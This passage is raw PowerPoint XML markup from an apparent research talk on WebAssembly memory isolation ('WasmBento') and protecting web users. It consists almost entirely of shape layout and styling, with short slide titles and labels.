                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9257603" y="606346"/>
                  <a:ext cx="2506222" cy="288377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Textfeld 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A924978-1C78-4E79-2F1B-2F8A4DD11B14}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9704940" y="645659"/>
                  <a:ext cx="1540926" cy="5266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Memory</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Grafik 56" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645C47C0-4923-473E-DB98-EB1D4AE3A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955710" y="2291509"/>
                <a:ext cx="781478" cy="781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44" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430250D9-0155-3203-B352-C6596E83F4CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="5344954"/>
              <a:ext cx="1584000" cy="439419"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EED1A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tag</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EFD7A61-4579-908A-654E-FF92578155EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="4771150"/>
              <a:ext cx="1584000" cy="573804"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC6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err="1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image</a:t>
              </a:r>
              <a:endParaRPr sz="140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46" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D53005D3-BF71-B618-09B0-2AD818F785AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581400" y="4223393"/>
              <a:ext cx="1584000" cy="573804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...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1BC8F54-6440-A46E-EB51-A37E2F2D1150}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3581505" y="5751032"/>
              <a:ext cx="1584000" cy="352870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...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17E26FA9-B1C0-AAC4-09A1-28608C7D6B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8712040" y="3508598"/>
            <a:ext cx="2809315" cy="2823073"/>
            <a:chOff x="7103169" y="3508598"/>
            <a:chExt cx="2809315" cy="2823073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D60FCDF5-7BCD-1B13-C2FB-07F7ECDAC3DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7103169" y="3508598"/>
              <a:ext cx="2809315" cy="2823073"/>
              <a:chOff x="4955710" y="2291509"/>
              <a:chExt cx="2809315" cy="3512916"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Rechteck: abgerundete Ecken 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48A15B1B-EC37-2212-72B6-9981A2C982B8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5250069" y="2382615"/>
                <a:ext cx="2514956" cy="3421810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uppieren 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C05BC2-B466-EB8E-F876-0333C28D1DC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5456710" y="2584683"/>
                <a:ext cx="2083246" cy="3145558"/>
                <a:chOff x="9257603" y="606346"/>
                <a:chExt cx="2506222" cy="2883773"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Rechteck: abgerundete Ecken 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CBCF802-A7C6-24FC-EFC9-493AEA0C79FA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9257603" y="606346"/>
                  <a:ext cx="2506222" cy="2883773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Textfeld 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E95BBD0E-A270-B5D9-B1CF-C1E5A6EA7B3F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9719326" y="645659"/>
                  <a:ext cx="1512154" cy="4232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bg1"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>Memory</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="50" name="Grafik 56" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6018E0D2-C782-8204-EF8D-FB5D28F6C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955710" y="2291509"/>
                <a:ext cx="781478" cy="78147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53" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731F0DEC-5849-16FD-9DCC-4E18DC425CF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7896390" y="5655624"/>
              <a:ext cx="1584000" cy="439419"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EED1A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tag</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C32BAAB-C73A-CBC0-7C23-2B6517DF4502}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7896390" y="4203696"/>
              <a:ext cx="1584000" cy="602497"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC6C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err="1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image</a:t>
              </a:r>
              <a:endParaRPr sz="140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55" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6735BA07-0F50-2ED2-0400-9C9077AFE05D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7896390" y="4734869"/>
              <a:ext cx="1584000" cy="573804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...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF05DF01-B36B-4572-3645-C04C4226F70E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7896390" y="5309395"/>
              <a:ext cx="1584000" cy="370702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...</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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93C7874C-AC92-4FBD-98D6-8749DE6FFD50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366873" y="4956742"/>
            <a:ext cx="1432501" cy="22860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68237A7-A5F1-F48B-5C27-CEBC5D053662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315468" y="5299268"/>
            <a:ext cx="163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Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/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6090A53-A95B-5FE3-F174-6D08945E284D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2798655" y="5292400"/>
            <a:ext cx="1715370" cy="941551"/>
            <a:chOff x="1189784" y="4759965"/>
            <a:chExt cx="1715370" cy="941551"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Pfeil: nach oben gebogen 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747376EA-5820-7418-F7F7-D08D015DFE7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1888208" y="4263079"/>
              <a:ext cx="520060" cy="1513832"/>
            </a:xfrm>
            <a:prstGeom prst="bentUpArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 31425"/>
                <a:gd name="adj3" fmla="val 25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3E14478F-3906-9097-995E-C290D1DA6B94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1189784" y="5332184"/>
              <a:ext cx="1630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First </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1"/>
                <a:t>execution</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Grafik 62" descr="Schild Häkchen mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B1C716-71D2-0089-8A50-213E336F36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8559" y="5222897"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66" name="Connector: Curved 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{296343F6-9797-0699-4BFF-6EB5B9A845D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86698" y="1812520"/>
            <a:ext cx="1855952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5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EEB6BCEA-4172-129C-693B-B62502982E89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6910015" y="4223393"/>
            <a:ext cx="0" cy="114770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D871BAEB-B7FA-C5B4-9BF7-E5A72302C1BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10667266" y="3830453"/>
            <a:ext cx="914400" cy="2302605"/>
            <a:chOff x="9058395" y="3830453"/>
            <a:chExt cx="914400" cy="2302605"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="64" name="Grafik 63" descr="Schild Häkchen mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD5D87C5-A976-6CF3-1C08-111DDC0BB36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58395" y="5218658"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6AC07794-F33F-0C50-9EC1-965849CCE4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9144" y="3830453"/>
              <a:ext cx="0" cy="98658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Verbinder: gekrümmt 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0603F2C9-14B8-6035-FEE5-DCCF7E9E94E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5509488" y="450534"/>
            <a:ext cx="2217131" cy="1093673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Verbinder: gekrümmt 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1E3DFE-667E-9EA0-73AD-BEBBB3D171C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1644487" y="2780625"/>
            <a:ext cx="996795" cy="472777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s://cdn1.iconfinder.com/data/icons/large-glossy-icons/512/Spy.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DBB9E9B-D217-5D8D-69A1-AC33D654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856" y="438647"/>
            <a:ext cx="700339" cy="7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Tornado Silhouette">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F6DA86-5FB4-4B93-E85D-F552578B8D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9268" y="3931896"/>
            <a:ext cx="1126156" cy="11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33594 0.6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97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0.01666 0.5405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  <p:bldP spid="30" grpId="1" animBg="1"/>
      <p:bldP spid="59" grpId="0" animBg="1"/>
      <p:bldP spid="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73B6-8240-1E50-96D5-8BE6E115B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4FC8BC2-2E46-5EC2-8058-E898A74C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3539722"/>
            <a:ext cx="10515600" cy="2592721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>WasmBento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>Unpacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t> Fine-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>Grained</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="5000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t>Memory Isolation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1C7499-4D19-8E17-3165-B1AF5404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90C637-36B0-E9C2-5A25-2447835D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451" y="6492874"/>
            <a:ext cx="5195099" cy="228601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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0E6E7C-6176-12AF-D077-9A0DF860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23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9AB343BC-2710-FF65-0178-493DD40406C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="214856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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protect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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users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exploitation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10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8B651D3-7743-5E98-DF42-F9A8BE60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e-DE" sz="5400" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5400" dirty="0" err="1"/>
              <a:t>Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5400" dirty="0"/>
              <a:t> Challenges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4DED1-4507-2FB4-B8E5-C0C3464D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147517-039D-937F-C754-3CBEA8074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391A94-7673-6AE7-8015-260E74EB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B18F4C-E8C4-4CE3-AB98-635666EFA01A}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>24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ED5BD1C-9A8E-D4B6-AF3D-57A7A274012B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4648018" y="643525"/>
            <a:ext cx="6900512" cy="5530734"/>
            <a:chOff x="4648018" y="643525"/>
            <a:chExt cx="6900512" cy="5530734"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Gerader Verbinder 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFFB748-F9C4-FF08-EDE1-0FE4D4514DD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648018" y="643525"/>
              <a:ext cx="6900512" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="lin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89F53C3-FD67-FFA1-9302-8A5CDA3DDB81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648018" y="643525"/>
              <a:ext cx="6900512" cy="1843578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1843578"/>
                <a:gd name="connsiteX1" fmla="*/ 6900512 w 6900512"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1843578"/>
                <a:gd name="connsiteX2" fmla="*/ 6900512 w 6900512"/>
                <a:gd name="connsiteY2" fmla="*/ 1843578 h 1843578"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY3" fmla="*/ 1843578 h 1843578"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 184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512" h="1843578">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6900512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6900512" y="1843578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18435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t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr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5100" dirty="0"/>
                <a:t>Drop-in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0" err="1"/>
                <a:t>replacement</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent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5100" kern="1200" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5100" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Gerader Verbinder 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D923E35-50FF-FE2A-6B83-53A9911A0A64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648018" y="2487103"/>
              <a:ext cx="6900512" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent2">
                <a:hueOff val="3604206"/>
                <a:satOff val="5500"/>
                <a:lumOff val="196"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="3604206"/>
                <a:satOff val="5500"/>
                <a:lumOff val="196"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="3604206"/>
                <a:satOff val="5500"/>
                <a:lumOff val="19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53000A6-6C9B-BABF-E5BD-97FDFC75D943}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648018" y="2487103"/>
              <a:ext cx="6900512" cy="1843578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1843578"/>
                <a:gd name="connsiteX1" fmla="*/ 6900512 w 6900512"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1843578"/>
                <a:gd name="connsiteX2" fmla="*/ 6900512 w 6900512"/>
                <a:gd name="connsiteY2" fmla="*/ 1843578 h 1843578"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY3" fmla="*/ 1843578 h 1843578"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 184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512" h="1843578">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6900512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6900512" y="1843578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18435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t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0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5100" dirty="0" err="1"/>
                <a:t>No</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0"/>
                <a:t> source code and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="5100" dirty="0" err="1"/>
                <a:t>binary-only</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="5100" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Gerader Verbinder 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE6D542-E6D1-ECE9-0EE8-AECDE4381E61}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648018" y="4330681"/>
              <a:ext cx="6900512" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent2">
                <a:hueOff val="7208412"/>
                <a:satOff val="10999"/>
                <a:lumOff val="393"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="accent2">
                <a:hueOff val="7208412"/>
                <a:satOff val="10999"/>
                <a:lumOff val="393"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="7208412"/>
                <a:satOff val="10999"/>
                <a:lumOff val="3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EFB9A9-C99A-A4F7-3196-437DE5E7D5EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4648018" y="4330681"/>
              <a:ext cx="6900512" cy="1843578"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6900512"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1843578"/>
